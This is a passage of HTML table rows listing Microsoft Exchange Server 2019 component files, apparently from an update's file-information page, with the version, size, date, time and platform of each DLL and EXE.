</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatenotificationservicelet.dll</td><td>15.2.464.11</td><td>23,424</td><td>01-Jan-2020
</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.common.dll</td><td>15.2.464.10</td><td>376,904</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.eventlogs.dll</td><td>15.2.464.10</td><td>83,840</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.clients.owa.dll</td><td>15.2.464.11</td><td>2,971,008</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.owa2.server.dll</td><td>15.2.464.11</td><td>5,029,760</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.owa2.servervariantconfiguration.dll</td><td>15.2.464.10</td><td>893,816</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.security.dll</td><td>15.2.464.11</td><td>413,560</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.strings.dll</td><td>15.2.464.10</td><td>924,536</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.bandwidthmonitor.dll</td><td>15.2.464.10</td><td>31,608</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.common.dll</td><td>15.2.464.10</td><td>52,296</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.common.extensions.dll</td><td>15.2.464.10</td><td>21,880</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.diskmonitor.dll</td><td>15.2.464.10</td><td>33,664</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replay.dll</td><td>15.2.464.10</td><td>3,515,264</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replicaseeder.dll</td><td>15.2.464.10</td><td>108,408</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.cluster.replicavsswriter.dll</td><td>15.2.464.10</td><td>288,872</td><td>01-Jan-2020</td>
<td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.cluster.shared.dll</td><td>15.2.464.10</td><td>625,536</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.agentconfig.transport.dll</td><td>15.2.464.10</td><td>86,400</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.componentconfig.transport.dll</td><td>15.2.464.10</td><td>1,830,272</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.adagentservicevariantconfig.dll</td><td>15.2.464.10</td><td>31,608</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.directoryvariantconfig.dll</td><td>15.2.464.10</td><td>465,784</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.domtvariantconfig.dll</td><td>15.2.464.10</td><td>25,472</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.ismemberofresolverconfig.dll</td><td>15.2.464.10</td><td>38,272</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.tenantrelocationvariantconfig.dll</td><td>15.2.464.10</td><td>102,784</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.topologyservicevariantconfig.dll</td><td>15.2.464.10</td><td>48,512</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.diskmanagement.dll</td><td>15.2.464.10</td><td>67,448</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.dll</td><td>15.2.464.10</td><td>173,136</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.encryption.variantconfig.dll</td><td>15.2.464.10</td><td>113,536</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.il.dll</td><td>15.2.464.10</td><td>13,904</td><td>01-Jan-2020</td><td>10:47</td><t
d>x86</td></tr><tr><td>Microsoft.exchange.common.inference.dll</td><td>15.2.464.10</td><td>130,632</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.optics.dll</td><td>15.2.464.10</td><td>63,864</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.processmanagermsg.dll</td><td>15.2.464.10</td><td>20,048</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.protocols.popimap.dll</td><td>15.2.464.10</td><td>15,440</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.search.dll</td><td>15.2.464.10</td><td>108,920</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.search.eventlog.dll</td><td>15.2.464.10</td><td>17,792</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.smtp.dll</td><td>15.2.464.10</td><td>51,584</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll</td><td>15.2.464.10</td><td>36,936</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.transport.azure.dll</td><td>15.2.464.10</td><td>27,720</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.transport.monitoringconfig.dll</td><td>15.2.464.10</td><td>1,042,504</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.commonmsg.dll</td><td>15.2.464.10</td><td>29,256</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.auditlogpumper.messages.dll</td><td>15.2.464.10</td><td>13,176</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.auditservice.core.dll</td><td>15.2.464.11</td><td>181,120</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.auditservice.messages.dll</td><td>15.2.464.10</td><td>30,08
0</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.common.dll</td><td>15.2.464.10</td><td>22,600</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.crimsonevents.dll</td><td>15.2.464.10</td><td>85,888</td><td>01-Jan-2020</td><td>10:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.dll</td><td>15.2.464.10</td><td>41,336</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.recordreview.dll</td><td>15.2.464.10</td><td>37,248</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.supervision.dll</td><td>15.2.464.10</td><td>50,552</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskcreator.dll</td><td>15.2.464.10</td><td>33,152</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskdistributioncommon.dll</td><td>15.2.464.10</td><td>1,100,672</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskdistributionfabric.dll</td><td>15.2.464.10</td><td>206,720</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskplugins.dll</td><td>15.2.464.10</td><td>211,016</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compression.dll</td><td>15.2.464.10</td><td>17,280</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.dll</td><td>15.2.464.10</td><td>37,752</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.eventlog.dll</td><td>15.2.464.10</td><td>14,416</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.core.dll</td><td>15.2.464.10</td><td>145,784</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.core.eve
ntlog.dll</td><td>15.2.464.10</td><td>14,200</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.dll</td><td>15.2.464.10</td><td>53,352</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.eventlog.dll</td><td>15.2.464.10</td><td>15,736</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.diagnosticsmodules.dll</td><td>15.2.464.10</td><td>23,416</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.diagnosticsmodules.eventlog.dll</td><td>15.2.464.10</td><td>13,184</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.failfast.dll</td><td>15.2.464.10</td><td>54,656</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.failfast.eventlog.dll</td><td>15.2.464.10</td><td>13,904</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.dll</td><td>15.2.464.10</td><td>1,845,832</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.eventlog.dll</td><td>15.2.464.10</td><td>30,280</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.dll</td><td>15.2.464.10</td><td>68,472</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.eventlog.dll</td><td>15.2.464.10</td><td>15,440</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll</td><td>15.2.464.10</td><td>21,368</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll</td><td>15.2.464.10</td><td>13,176</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></
tr><tr><td>Microsoft.exchange.connectiondatacollector.dll</td><td>15.2.464.10</td><td>25,976</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.common.dll</td><td>15.2.464.10</td><td>170,064</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.eas.dll</td><td>15.2.464.10</td><td>330,112</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.imap.dll</td><td>15.2.464.10</td><td>173,944</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.pop.dll</td><td>15.2.464.10</td><td>71,040</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.contentfilter.wrapper.exe</td><td>15.2.464.10</td><td>203,640</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.context.client.dll</td><td>15.2.464.10</td><td>27,208</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.configuration.dll</td><td>15.2.464.10</td><td>51,792</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.core.dll</td><td>15.2.464.10</td><td>51,072</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.datamodel.dll</td><td>15.2.464.10</td><td>46,968</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.core.strings.dll</td><td>15.2.464.10</td><td>1,093,504</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.core.timezone.dll</td><td>15.2.464.10</td><td>57,208</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.deep.dll</td><td>15.2.464.10</td><td>326,528</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.dll</td><td>15.2.464.10</td><td>3,353,160</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.ap
plicationlogic.eventlog.dll</td><td>15.2.464.10</td><td>35,712</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.monitoring.ifx.dll</td><td>15.2.464.10</td><td>17,784</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.connectors.dll</td><td>15.2.464.10</td><td>165,240</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.consumermailboxprovisioning.dll</td><td>15.2.464.10</td><td>619,384</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.dll</td><td>15.2.464.10</td><td>7,787,592</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.eventlog.dll</td><td>15.2.464.10</td><td>80,248</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.dll</td><td>15.2.464.10</td><td>1,789,304</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.groupmailboxaccesslayer.dll</td><td>15.2.464.10</td><td>1,626,496</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.ha.dll</td><td>15.2.464.10</td><td>375,168</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.imageanalysis.dll</td><td>15.2.464.10</td><td>105,856</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mailboxfeatures.dll</td><td>15.2.464.10</td><td>15,944</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mailboxloadbalance.dll</td><td>15.2.464.10</td><td>224,848</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mapi.dll</td><td>15.2.464.10</td><td>186,752</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.metering.contracts.dll</td><td>15.2.464.10</td><td>39,808</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.da
ta.metering.dll</td><td>15.2.464.10</td><td>119,376</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.msosyncxsd.dll</td><td>15.2.464.10</td><td>968,064</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.notification.dll</td><td>15.2.464.10</td><td>141,184</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.personaldataplatform.dll</td><td>15.2.464.10</td><td>769,608</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.providers.dll</td><td>15.2.464.10</td><td>139,856</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.provisioning.dll</td><td>15.2.464.10</td><td>56,704</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.rightsmanagement.dll</td><td>15.2.464.10</td><td>452,992</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.scheduledtimers.dll</td><td>15.2.464.10</td><td>32,872</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.clientstrings.dll</td><td>15.2.464.10</td><td>256,888</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.dll</td><td>15.2.464.10</td><td>11,808,848</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.eventlog.dll</td><td>15.2.464.10</td><td>37,760</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.storageconfigurationresources.dll</td><td>15.2.464.10</td><td>655,736</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storeobjects.dll</td><td>15.2.464.10</td><td>175,696</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.dll</td><td>15.2.464.10</td><td>36,216</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.
data.throttlingservice.client.eventlog.dll</td><td>15.2.464.10</td><td>14,440</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.eventlog.dll</td><td>15.2.464.10</td><td>14,200</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll</td><td>15.2.464.10</td><td>14,712</td><td>01-Jan-2020</td><td>10:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenterstrings.dll</td><td>15.2.464.11</td><td>72,784</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.delivery.eventlog.dll</td><td>15.2.464.10</td><td>13,176</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnostics.certificatelogger.dll</td><td>15.2.464.10</td><td>23,120</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.dll</td><td>15.2.464.10</td><td>2,212,944</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.performancelogger.dll</td><td>15.2.464.10</td><td>23,928</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.common.dll</td><td>15.2.464.10</td><td>546,888</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.eventlog.dll</td><td>15.2.464.10</td><td>215,416</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnostics.service.exchangejobs.dll</td><td>15.2.464.10</td><td>194,424</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.exe</td><td>15.2.464.10</td><td>146,512</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.fuseboxperfcounters.dll</td><td>15.2.464.10</td><td>27,520</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnosticsaggregation.event
log.dll</td><td>15.2.464.10</td><td>13,688</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnosticsaggregationservicelet.dll</td><td>15.2.464.10</td><td>49,536</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.directory.topologyservice.eventlog.dll</td><td>15.2.464.10</td><td>28,264</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.directory.topologyservice.exe</td><td>15.2.464.10</td><td>208,760</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.disklocker.events.dll</td><td>15.2.464.10</td><td>89,168</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.disklocker.interop.dll</td><td>15.2.464.10</td><td>32,640</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.drumtesting.calendarmigration.dll</td><td>15.2.464.10</td><td>45,944</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.drumtesting.common.dll</td><td>15.2.464.10</td><td>18,816</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.dxstore.dll</td><td>15.2.464.10</td><td>473,680</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.dxstore.ha.events.dll</td><td>15.2.464.10</td><td>206,200</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.dxstore.ha.instance.exe</td><td>15.2.464.10</td><td>36,736</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.eac.flighting.dll</td><td>15.2.464.10</td><td>131,664</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgecredentialsvc.exe</td><td>15.2.464.10</td><td>21,880</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.common.dll</td><td>15.2.464.10</td><td>148,344</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.datacenterprov
iders.dll</td><td>15.2.464.10</td><td>220,024</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.eventlog.dll</td><td>15.2.464.10</td><td>23,928</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.edgesyncsvc.exe</td><td>15.2.464.10</td><td>97,872</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.ediscovery.export.dll</td><td>15.2.464.11</td><td>1,266,040</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.ediscovery.export.dll.deploy</td><td>15.2.464.11</td><td>1,266,040</td><td>01-Jan-2020</td><td>10:48</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.application</td><td>Not applicable</td><td>16,323</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.exe.deploy</td><td>15.2.464.11</td><td>87,632</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.manifest</td><td>Not applicable</td><td>66,586</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.strings.dll.deploy</td><td>15.2.464.11</td><td>52,088</td><td>01-Jan-2020</td><td>10:51</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.mailboxsearch.dll</td><td>15.2.464.11</td><td>292,216</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.birthdaycalendar.dll</td><td>15.2.464.10</td><td>73,288</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.defaultservicesettings.dll</td><td>15.2.464.10</td><td>46,152</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.dll</td><td>15.2.464.10</td><td>218,728</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.management.dll</td><td>15.2.464.10</td><td>78,208</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.bookings.dll</td><td>15.2.464.10</td><td>35,704</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.calendaring.dll</td><td>15.2.464.10</td><td>936,320</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.common.dll</td><td>15.2.464.10</td><td>336,456</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.connectors.dll</td><td>15.2.464.10</td><td>52,608</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.contentsubmissions.dll</td><td>15.2.464.10</td><td>32,128</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.context.dll</td><td>15.2.464.10</td><td>61,008</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.datamodel.dll</td><td>15.2.464.10</td><td>854,088</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.fileproviders.dll</td><td>15.2.464.10</td><td>291,920</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.foldersharing.dll</td><td>15.2.464.10</td><td>39,496</td><td>01-Jan
-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.holidaycalendars.dll</td><td>15.2.464.10</td><td>76,360</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.insights.dll</td><td>15.2.464.10</td><td>166,784</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetinglocation.dll</td><td>15.2.464.10</td><td>1,486,720</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetingparticipants.dll</td><td>15.2.464.10</td><td>122,232</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetingtimecandidates.dll</td><td>15.2.464.10</td><td>12,327,296</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.onlinemeetings.dll</td><td>15.2.464.10</td><td>264,264</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.people.dll</td><td>15.2.464.10</td><td>37,760</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.peopleinsights.dll</td><td>15.2.464.10</td><td>186,952</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.reminders.dll</td><td>15.2.464.10</td><td>64,384</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.schedules.dll</td><td>15.2.464.10</td><td>84,048</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.shellservice.dll</td><td>15.2.464.10</td><td>64,072</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.tasks.dll</td><td>15.2.464.10</td><td>100,216</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.xrm.dll</td><td>15.2.464.10</td><td>144,968</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.entityextraction.calendar.dll</td><td>15.2.464.10</td><td>270,416
</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.common.dll</td><td>15.2.464.10</td><td>15,232</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.configuration.dll</td><td>15.2.464.10</td><td>15,744</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.dll</td><td>15.2.464.10</td><td>130,424</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.ews.configuration.dll</td><td>15.2.464.10</td><td>254,544</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.exchangecertificate.eventlog.dll</td><td>15.2.464.10</td><td>13,184</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.exchangecertificateservicelet.dll</td><td>15.2.464.11</td><td>37,448</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.internal.dll</td><td>15.2.464.10</td><td>640,384</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.partner.dll</td><td>15.2.464.10</td><td>37,480</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.federateddirectory.dll</td><td>15.2.464.11</td><td>146,504</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.ffosynclogmsg.dll</td><td>15.2.464.10</td><td>13,176</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></t